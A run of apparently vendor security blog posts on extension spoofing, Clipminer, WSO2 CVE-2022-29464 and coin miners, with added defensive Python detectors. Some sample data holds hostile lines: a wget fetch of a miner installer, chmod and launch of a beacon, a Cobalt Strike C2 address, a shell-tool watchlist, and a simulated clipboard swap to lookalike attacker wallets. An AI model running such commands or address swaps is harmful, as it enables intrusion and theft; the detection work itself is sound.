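EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe", "js",
                   "jse", "wsf", "wsh", "ps1", "msi", "hta", "cpl", "dll"}
# Unicode right-to-left override: "invoice\u202Efdp.exe" is displayed as
# "invoiceexe.pdf" while the real name still ends in ".exe".
RLO = "\u202e"


def disguise_reasons(filename: str, head: bytes = b"") -> List[str]:
    """Return why a file name (plus optional leading bytes) looks spoofed.

    An empty list means nothing suspicious was found.
    """
    reasons = []
    name = os.path.basename(filename)
    if RLO in name:
        reasons.append("name contains a right-to-left override character")
        name = name.replace(RLO, "")  # inspect the extension underneath
    parts = name.lower().split(".")
    real_ext = parts[-1] if len(parts) > 1 else ""
    inner_exts = parts[1:-1]
    # Only the last extension decides what opens the file; document-looking
    # extensions before it are decoration ("report.xlsx.exe").
    if real_ext in EXECUTABLE_EXTS and any(p in DOCUMENT_EXTS for p in inner_exts):
        reasons.append(f"document-style name but the real extension is .{real_ext}")
    # Content check independent of the name: PE executables start with "MZ".
    if head[:2] == b"MZ" and real_ext not in EXECUTABLE_EXTS:
        reasons.append("PE executable header behind a non-executable extension")
    return reasons


def scan(files) -> dict:
    """Map each suspicious file name to its reasons; clean files are omitted."""
    result = {}
    for name, head in files:
        reasons = disguise_reasons(name, head)
        if reasons:
            result[name] = reasons
    return result


# Constructed samples: the names mimic the campaign described above.
SAMPLE_FILES = [
    ("resumenes info socioeco.xlsx.exe", b"MZ\x90\x00"),
    ("confiromidad entrega material.xlsx.exe", b"MZ\x90\x00"),
    ("report.xlsx", b"MZ\x90\x00"),            # renamed executable
    ("invoice\u202efdp.exe", b"MZ\x90\x00"),   # RLO trick
    ("quarterly.xlsx", b"PK\x03\x04"),          # genuine OOXML (zip) document
    ("archive.tar.gz", b"\x1f\x8b"),            # double extension, but harmless
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_FILES).items():
        print(repr(name), "->", "; ".join(reasons))
```

A mail gateway or a download hook can feed real attachment names and their first bytes into scan(); the content check matters most, because it catches a renamed executable that carries no second extension at all.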

The post Extension spoofing strikes Spanish-speaking countries appeared first on Gridinsoft Blog.

Clipminer – a Million Dollar Clipboard Hijacking Coinminer
https://gridinsoft.com/blogs/clipminer-coinminer/ (Fri, 03 Jun 2022 22:43:39 +0000)

A remarkably profitable botnet cryptocurrency miner has been described by Symantec security researchers. Besides the classic mining function, it hijacks the clipboard, hence the name “Clipminer.” That feature alone has brought its operators approximately $1.7M.

Let’s begin with the infection chain. The trojanized WinRAR archive comes from untrustworthy software downloads and self-extracts, launching a downloader through an executable DLL with a .cpl extension. That file opens a connection to Tor, over which the miner components are fetched and assembled. When the system is idle, the malware starts the XMRig miner; this selectivity keeps the activity low-key. The right time is when mouse movement stops and no keystrokes are detected. If the computer has a GPU, the malware deploys a different mining program for it.


Besides stealing the PC’s resources for mining, Clipminer takes over the victim’s clipboard. As soon as the user copies anything that looks like a cryptocurrency wallet address (in order to send coins there), Clipminer replaces it with one of the many addresses at the crooks’ disposal. The user hardly notices the replacement, and the large pool lets the criminals pick an address that looks similar to the original. The pool is large indeed: more than 4 thousand wallet addresses, over 3 thousand of them covering just the three Bitcoin address formats. Clipminer recognizes at least 12 different cryptocurrencies. In the first days of June 2022, its BTC and ETH wallets held about 34.3 and 129.9 coins, respectively.
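To make the substitution concrete, here is an added simulation, not Clipminer’s code, built on constructed addresses: classify() recognises four address formats (three Bitcoin formats plus Ethereum), hijack() picks from an assumed attacker pool the address sharing the longest leading and trailing run of characters with the one copied, which is why glancing at the first and last few characters is not enough, and paste_is_tampered() is the check a wallet front end or a careful user should apply before sending.

```python
# Added example (not Clipminer's code): simulate the clipboard swap described
# above and the check that catches it. Addresses below are constructed.
import re
from typing import Dict, List, Optional

# Address formats: three Bitcoin styles (legacy P2PKH, P2SH, bech32) and Ethereum.
ADDRESS_PATTERNS = {
    "BTC-P2PKH": re.compile(r"^1[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "BTC-P2SH": re.compile(r"^3[1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "BTC-bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{11,71}$"),
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

# Assumed attacker pool: a few addresses per format. The real malware holds
# thousands, which is what makes a close lookalike likely.
ATTACKER_POOL: Dict[str, List[str]] = {
    "BTC-P2PKH": [
        "1BvBMS" + "x" * 23 + "VN2",      # shares prefix/suffix with the victim below
        "1Ax7yqPmKJt2nR9sVwHqNdpBzXcE4FgW5",
    ],
    "ETH": [
        "0xa1b2" + "f" * 32 + "5678",
        "0x" + "9" * 40,
    ],
}


def classify(text: str) -> Optional[str]:
    """Return the address format of the clipboard text, or None if it is not one."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def common_ends(a: str, b: str) -> int:
    """Count leading plus trailing characters shared by a and b: a rough
    measure of how alike the two look to a glance at the ends."""
    limit = min(len(a), len(b))
    lead = 0
    while lead < limit and a[lead] == b[lead]:
        lead += 1
    trail = 0
    while trail < limit - lead and a[-1 - trail] == b[-1 - trail]:
        trail += 1
    return lead + trail


def hijack(clipboard: str, pool: Dict[str, List[str]] = ATTACKER_POOL) -> str:
    """What the malware does: if the clipboard holds a supported address,
    replace it with the attacker's closest lookalike of the same format."""
    kind = classify(clipboard)
    if kind is None or not pool.get(kind):
        return clipboard
    return max(pool[kind], key=lambda candidate: common_ends(clipboard, candidate))


def paste_is_tampered(copied: str, pasted: str) -> bool:
    """Defender check: what lands in the send form must equal what was copied."""
    return copied.strip() != pasted.strip()


if __name__ == "__main__":
    victim = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2"   # constructed victim address
    swapped = hijack(victim)
    print(victim, "->", swapped, "| tampered:", paste_is_tampered(victim, swapped))
```

Run it and the printed swap keeps the first six and last three characters of the original, exactly the portion a hurried user compares; the byte-for-byte check in paste_is_tampered() is the comparison that should happen instead, ideally in the wallet software itself.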

The $1.7M figure mentioned above includes crypto passed through so-called cryptocurrency tumblers, where coins from different sources are mixed so that their origin cannot be traced.

The post Clipminer – a Million Dollar Clipboard Hijacking Coinminer appeared first on Gridinsoft Blog.

A WSO2 Vulnerability is Fraught with Remote Code Execution
https://gridinsoft.com/blogs/vso2-rce-vulnerability/ (Tue, 31 May 2022 22:04:00 +0000)
Products by WSO2, a vendor of open-source API management, identity and integration software, have been attacked in the wild through CVE-2022-29464, a vulnerability disclosed in April 2022.

This vulnerability allows an unauthenticated attacker to execute code remotely by way of an unrestricted file upload.

The attack starts with the upload of a *.jsp or *.war file that installs a web shell, taking advantage of CVE-2022-29464. With the web shell in place, the attacker runs arbitrary commands from the Java process that hosts the WSO2 product.

RELATED: Microsoft warns of growing number of attacks using web shells.

Scheme of the attack (image: Trend Micro).

The attack ends with the installation of a coin miner and a Cobalt Strike beacon (a backdoor). The miner is fetched by a wget command launched from the Java process, which downloads the auto.sh file (the miner installer). In parallel, and also through the web shell, the Java process runs chmod to make a file named “LBcgqCymZQhm” executable and then launches it. That process opens an outbound connection to 179[.]60[.]150[.]29 on port 4444, an address earlier seen in numerous Cobalt Strike attacks; hence LBcgqCymZQhm is a Cobalt Strike beacon.

The most interesting detail is that the Cobalt Strike beacon, originally built for Windows, runs on Linux in these attacks, which means the attackers deliberately worked on a Linux-compatible build of the backdoor.
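The chain above translates into a few detection rules. The following is an added example, not from the post or from Trend Micro, that runs those rules over constructed process and network events written in a simple key=value form; the event format, the file paths and the download host are assumptions, while the C2 address, port and beacon file name are the ones quoted in the text.

```python
# Added example (not from the post or Trend Micro): match the post-exploitation
# chain above against constructed process and network events.
import re
from typing import Dict, List

# Indicators quoted in the text above.
C2_ENDPOINT = "179.60.150.29:4444"
BEACON_NAME = "LBcgqCymZQhm"
WEB_SHELL_EXT = re.compile(r"\.(jsp|war)$", re.IGNORECASE)
# Tools the Java process should never spawn on a WSO2 host (assumed list).
SHELL_TOOLS = {"wget", "curl", "chmod", "sh", "bash"}

# Constructed events in a key=value form; the format, paths and download host
# are assumptions, not a real product's log.
SAMPLE_EVENTS = """
type=file_write parent=java path=/srv/wso2/webapps/shell.jsp
type=exec parent=java cmd=wget http://198.51.100.7/auto.sh -O /tmp/auto.sh
type=exec parent=java cmd=sh /tmp/auto.sh
type=exec parent=java cmd=chmod +x /tmp/LBcgqCymZQhm
type=exec parent=java cmd=/tmp/LBcgqCymZQhm
type=net_connect parent=LBcgqCymZQhm dst=179.60.150.29:4444
type=exec parent=bash cmd=ls -la /var/log
type=net_connect parent=java dst=10.0.0.5:443
""".strip().splitlines()

# A value runs until the next " key=" token, so commands may contain spaces.
KV = re.compile(r"(\w+)=((?:(?!\s\w+=).)*)")


def parse_event(line: str) -> Dict[str, str]:
    """Split 'k=v k=v ...' into a dict."""
    return {m.group(1): m.group(2).strip() for m in KV.finditer(line)}


def detect(lines: List[str]) -> List[str]:
    """Return one finding per event that matches a stage of the chain."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        kind, parent, cmd = ev.get("type"), ev.get("parent", ""), ev.get("cmd", "")
        first_word = cmd.split()[0] if cmd else ""
        if kind == "file_write" and parent == "java" and WEB_SHELL_EXT.search(ev.get("path", "")):
            findings.append("web shell dropped by the Java process: " + ev["path"])
        elif kind == "exec" and parent == "java" and first_word in SHELL_TOOLS:
            findings.append("Java process spawned shell tooling: " + cmd)
        elif kind == "exec" and BEACON_NAME in cmd:
            findings.append("known beacon file executed: " + cmd)
        elif kind == "net_connect" and ev.get("dst") == C2_ENDPOINT:
            findings.append(f"outbound to known Cobalt Strike C2 from {parent}: {ev['dst']}")
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

The first two rules are the durable ones: an application server writing .jsp or .war files outside a deployment, or spawning wget, chmod or a shell, is suspicious on any Java host regardless of which C2 address or file name this particular campaign used.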

The vulnerable software includes WSO2 API Manager 2.2.0 and above, Identity Server 5.2.0 and above, Identity Server Analytics 5.4.0 to 5.6.0, Identity Server as Key Manager 5.3.0 and above, Open Banking AM 1.4.0 and above, and Enterprise Integrator 6.2.0 and above. A patch is available, so all users of these products are advised to apply it as soon as possible; until then, look for unexpected .jsp or .war files in the deployment directories and for the Java process spawning wget, chmod or shell commands.

WSO2 clients span many industries, critical ones included: healthcare, finance, energy, education, communications and government. Should attackers exploit CVE-2022-29464 against unpatched systems, the consequences could be severe.


The post A WSO2 Vulnerability is Fraught with Remote Code Execution appeared first on Gridinsoft Blog.

What is the worst computer virus? Figuring out
https://gridinsoft.com/blogs/worst-computer-virus/ (Wed, 27 Jan 2021 14:41:37 +0000)
The worst computer virus: what is it? Anyone who has ever been infected seems to ask this question, and each user thinks their case was worse than anyone else’s. Is that true? And which virus is really the worst?

It is important to mention that “computer viruses” are not only viruses. Nowadays the term is used for all types of malicious programs, but strictly speaking a virus is just one type of malware, alongside backdoors, coin miners, spyware and ransomware. You can read more about how that happened in our article.

    The worst computer virus – what is it like?

First, let’s define what “the worst computer virus” means. Different malware does different kinds of damage, and none of it is welcome: it can break your network configuration and system settings, encrypt your files or even damage your hardware. The most dangerous ones hurt every element of your system at once. Some of this malware aims at making money on you; some just makes your life harder. Here is the top-5 list of the worst computer viruses, starting from the least dangerous.

5th place. Coin miner trojan

This malware uses your hardware to mine cryptocurrencies, mainly Monero and DarkCoin. What is the risk for your computer? First of all, it puts a significant load on your hardware, about 70-90% on both CPU and GPU. That easily leads to overheating, which never helps the lifespan of your hardware, and GPU wear is much higher when it is used for mining. Laptops are in the most danger: their cooling is not designed for constantly overloaded hardware.

Coin miner consuming over 60% of CPU power; antivirus software cannot work properly in such conditions.

Another side of the problem is that modern coin miner trojans sometimes carry a spyware module, which means your personal data will not stay personal. Read the next paragraph.

4th place. Spyware

Spyware is designed to steal all possible personal information from the victim’s PC: location, language settings, cookies, search history, hours of activity, even the PC configuration is leaked to the crooks. Depending on the kind of attack, mass or targeted, this information is sold to third parties or used for further attacks. Spyware is extremely silent: it tries to stay in your system as long as possible to collect more information about you. Most samples of this type can also steal your conversations, so don’t be surprised to see some very private information made available to everyone.

The scheme of spyware actions.

Its stealthiness makes spyware a tough nut for antivirus programs. Security tools often struggle to detect it correctly with a heuristic engine, and even when they do, you will probably see a “generic” detection, which sometimes means a false positive and is therefore ignored.

3rd place. Banking trojans

What can be worse than having your personal information stolen? Having your banking information stolen. And we are talking not only about card numbers and CVV codes; they matter, but are almost useless without transaction approval. Modern banking trojans aim at your online banking, specifically at its login and password. With those, the crooks are free to manage your money.

The page displayed by the most primitive banking trojans.

Banking trojans are sometimes combined with other malware: embedded into spyware, rogue software or phishing trojans. Since they target well-protected things, online banking login forms, they are made by professionals. It is a bad idea to ignore their efficiency; otherwise you may end up looking at a zero balance, or at a large loan taken out in your name.

2nd place. Wiper

This type of malware has always been rare, but its danger cannot be underestimated. A wiper destroys your disk partitions. It is not about making money on you; it is for revenge or mischief. With the partition table broken, you lose access to all your files and to the operating system: the firmware can no longer find a boot record, and the data on your disks is left as an unstructured mess of bytes. Wipers are so rare that some anti-malware programs do not even have them in their detection databases.

Such a program needs low-level access to your system, at the driver or raw-disk level. Hence, expect the hazard from programs that pretend to be driver updaters, “system optimization tools” or other deep-configuration utilities. Such tools are considered dangerous anyway because of their questionable functionality, and the chance of having your logical disks ruined only adds to it.

1st place. Ransomware

What is more painful than having your partitions destroyed? Having your files encrypted. Partitions can often be recovered with special tools run from a LiveCD, but files hit by ransomware usually cannot be fixed. Decryption tools exist for several ransomware families, but none of them guarantees that you get your files back. The criminals’ own offer is to pay the ransom, $1000 and more, and even that is no guarantee.

Ransomware note.

Ransomware uses strong encryption: AES-256, RSA-1024, RSA-2048 or even ECC. Brute-forcing it would take longer than the universe has existed. The only lucky chance of getting your files back without paying is to be hit by ransomware with a flawed encryption implementation. The best-known family with flaws in its key handling is HiddenTear, but its more modern variants have those holes fixed. Another way to get the decryption key is to wait for the ransomware group to shut down and release its keys, but that gives no guarantees either.

Ransomware also does heavy damage to your system configuration. To prevent the use of anti-malware software, it blocks access to the websites of the vendors listed on VirusTotal, and it blocks the launch of antivirus installers. That means your HOSTS file and Group Policies have been significantly modified. If you just remove the ransomware and skip system recovery, you will probably see your system malfunctioning.
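One way to spot the HOSTS tampering mentioned above is the following added example, not the post’s code: parse the file, list every hostname mapped to a sinkhole address, and highlight the security vendors among them. The vendor keyword list and the sample HOSTS contents are constructed for illustration.

```python
# Added example (not from the post): find HOSTS entries that sinkhole
# security vendors' sites, the way ransomware described above does.
import ipaddress
from typing import List, Tuple

SINKHOLE_IPS = {"127.0.0.1", "0.0.0.0", "::1"}
# Assumed watchlist; extend it with the vendors you actually rely on.
VENDOR_KEYWORDS = ("gridinsoft", "virustotal", "malwarebytes", "kaspersky",
                   "eset", "avast", "bitdefender", "sophos", "microsoft")

# Constructed HOSTS content: the stock localhost lines, then planted entries.
SAMPLE_HOSTS = """
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0 www.virustotal.com
127.0.0.1 gridinsoft.com   # planted by the malware
127.0.0.1 download.malwarebytes.com
0.0.0.0 ads.example.net
192.0.2.10 intranet.example.local
"""


def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (ip, hostname) pairs, ignoring comments and blank lines."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = str(ipaddress.ip_address(fields[0]))  # normalises IPv4/IPv6 text
        except ValueError:
            continue   # malformed line, not a mapping
        for host in fields[1:]:                # one IP may list several names
            pairs.append((ip, host.lower()))
    return pairs


def blocked_domains(text: str) -> List[str]:
    """Hostnames other than localhost that resolve to a sinkhole address."""
    return [host for ip, host in parse_hosts(text)
            if ip in SINKHOLE_IPS and host not in ("localhost", "localhost.localdomain")]


def blocked_vendors(text: str) -> List[str]:
    """The subset of blocked_domains that belongs to security vendors."""
    return [host for host in blocked_domains(text)
            if any(keyword in host for keyword in VENDOR_KEYWORDS)]


if __name__ == "__main__":
    print("sinkholed:", blocked_domains(SAMPLE_HOSTS))
    print("security vendors sinkholed:", blocked_vendors(SAMPLE_HOSTS))
```

On Windows the file to read is C:\Windows\System32\drivers\etc\hosts, on Linux /etc/hosts; any entry that blocked_domains() returns and that you did not add yourself deserves a look, and a hit in blocked_vendors() on a machine that has just been cleaned is a sign the recovery step the text mentions was skipped. The Group Policy changes need a separate check; they are not stored in this file.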

Share this article and don’t forget to give your opinion on the worst computer virus in the comments. We will add the most interesting variants to the text, so describe them well. Good luck!

The post What is the worst computer virus? Figuring out appeared first on Gridinsoft Blog.

Coin Miner – What is it?
https://gridinsoft.com/blogs/about-coin-miner/ (Wed, 27 Jan 2021 14:27:13 +0000)
Throughout the evolution of the trojan virus, it has taken a lot of different forms and become global malware that can exploit your computer however it wants. In this article, I will tell you about one particular type of trojan: the Trojan Coin Miner, also known as the “Coin Miner Virus”.

    Coin miners: essence, spreading and reasons for appearing

Trojans that could use an infected machine for cryptocurrency mining had existed for years before the boom, but their spread was not explosive: there was no reason for mass distribution. Cryptocurrencies were still unpopular and their prices were low, so cybercriminals saw little potential in this type of malware.

Things changed in 2017, when the first cryptocurrency rush occurred. Bitcoin approached the $20000 mark for a single coin, and other coins, like Ethereum, Litecoin or Ripple, were also at their highs. This kind of asset attracted (and still attracts) big money, and where big money is, people who want an illegal bite of it appear.

The peak of trojan-miner activity was reached in March 2018. When the price of Bitcoin fell back towards $5000, coin miner activity dropped too. The chart below shows the close correlation between miner activity and cryptocurrency prices.

Chart of coin miner activity against the Bitcoin price.

In the summer of 2021, when cryptocurrency prices began pumping again, trojan miners quickly returned to the 2018 peak and kept growing as the Bitcoin price rose to $40000. Nowadays, coin-mining trojans are as active as they have ever been.

    How can I detect that my PC is infected with coin miner trojan?

Have you ever tried to use an old computer with a fresh Windows install? The system freezes on every operation: there is not enough RAM and the HDD is slow, so the operating system constantly pages memory out to the swap file. Coin miners bring those feelings back. Your CPU and GPU are loaded to 100% regardless of how many programs are running. Google Chrome takes more than a minute to open, Photoshop may crash on launch, and you can do nothing about it. It does not matter how high-end your computer is; even systems with a Core i9-12900KF or Ryzen 7 6800H and an RTX 3090 will suffer.

Coin miner consuming 95% of CPU capacity.

If you have these symptoms, there is a coin miner in your system. The final confirmation is a strange process in the Task Manager. Sometimes coin miner developers do not even try to hide it and name the process “miner” or “trainer”. Whatever it is called, this process consumes an enormous share of your CPU/GPU capacity, so you will easily distinguish it from the others; a process that sits at 70-100% for many minutes while you are doing nothing is the sign to look for.
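To turn the Task Manager check into something repeatable, here is an added example, not from the post: given periodic samples of per-process CPU usage (constructed here, but collectable with psutil or Get-Process), it flags processes that stay above the threshold for several consecutive samples and processes whose names match the patterns quoted above. A short burst from a browser is ignored, while a miner that starts only once the system goes idle is still caught as soon as it has run long enough.

```python
# Added example (not from the post): flag processes that keep the CPU busy
# for many consecutive samples, plus tell-tale process names.
from collections import defaultdict
from typing import Dict, List, Tuple

SUSPICIOUS_NAMES = ("miner", "xmrig", "trainer")   # names quoted in the posts above
CPU_THRESHOLD = 70.0       # the post quotes 70-90% sustained load
MIN_SAMPLES = 5            # consecutive samples above threshold (one per minute here)

# Constructed samples of (minute, process name, cpu percent); not real telemetry.
SAMPLES: List[Tuple[int, str, float]] = (
    [(m, "svchost.exe", 3.0) for m in range(10)]
    + [(m, "chrome.exe", 95.0 if m < 2 else 8.0) for m in range(10)]   # short burst
    + [(m, "sysupdate.exe", 88.0) for m in range(10)]                   # sustained, bland name
    + [(m, "miner.exe", 75.0 if m >= 4 else 1.0) for m in range(10)]   # starts once idle
)


def sustained_high_cpu(samples, threshold=CPU_THRESHOLD, min_samples=MIN_SAMPLES) -> Dict[str, int]:
    """Map process name to its longest run of consecutive samples at or above
    threshold, keeping only runs of at least min_samples."""
    series = defaultdict(list)
    for _minute, name, cpu in sorted(samples):   # sort puts samples in time order
        series[name].append(cpu)
    flagged = {}
    for name, values in series.items():
        run = longest = 0
        for cpu in values:
            run = run + 1 if cpu >= threshold else 0   # a dip below resets the run
            longest = max(longest, run)
        if longest >= min_samples:
            flagged[name] = longest
    return flagged


def suspicious_processes(samples) -> Dict[str, List[str]]:
    """Combine the load rule with the naming hint: a miner with a bland name
    is still caught by load, a renamed one that idles is caught by name."""
    reasons: Dict[str, List[str]] = defaultdict(list)
    for name, run in sustained_high_cpu(samples).items():
        reasons[name].append(f"{run} consecutive samples at or above {CPU_THRESHOLD:.0f}% CPU")
    for name in sorted({name for _, name, _ in samples}):
        if any(hint in name.lower() for hint in SUSPICIOUS_NAMES):
            reasons[name].append("name matches a known miner naming pattern")
    return dict(reasons)


if __name__ == "__main__":
    for name, why in suspicious_processes(SAMPLES).items():
        print(name, "->", "; ".join(why))
```

The threshold and window are the knobs to tune: a miner tuned to stay under 50% on a busy workstation needs a lower threshold and a longer window, which is why the sampling interval and MIN_SAMPLES are parameters rather than constants baked into the logic.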

    Are coin miners dangerous?

There is a widespread misconception that coin miners carry no danger because all they do is load your hardware to its maximum. That may be true for users who regularly check their PC for hardware issues such as dust in the coolers or worn moving parts. But what about the average user who cleans the cooling fan only once it whines loudly at startup? Or people with a bad or weak power supply that delivers unstable current?

In those cases, a long overload may well lead to broken components. The CPU is sensitive to overheating, and a malfunctioning cooling system lets it reach dangerous temperatures quickly. Unstable current is even worse: voltage swings can kill individual components and the whole motherboard, so you would need a new one on top of the broken parts.

Hardware damage is not the only thing to be afraid of. Given the modern trend of making malware modular, your PC will likely be infected with several other threats: spyware, keyloggers, adware, backdoors and even ransomware. The possible damage is enormous: stolen data and credentials, encrypted files, your PC joining a botnet, remote control, and that is not the full list. Scan your computer as soon as possible and remove all malicious items.

    The post Coin Miner – What is it? appeared first on Gridinsoft Blog.
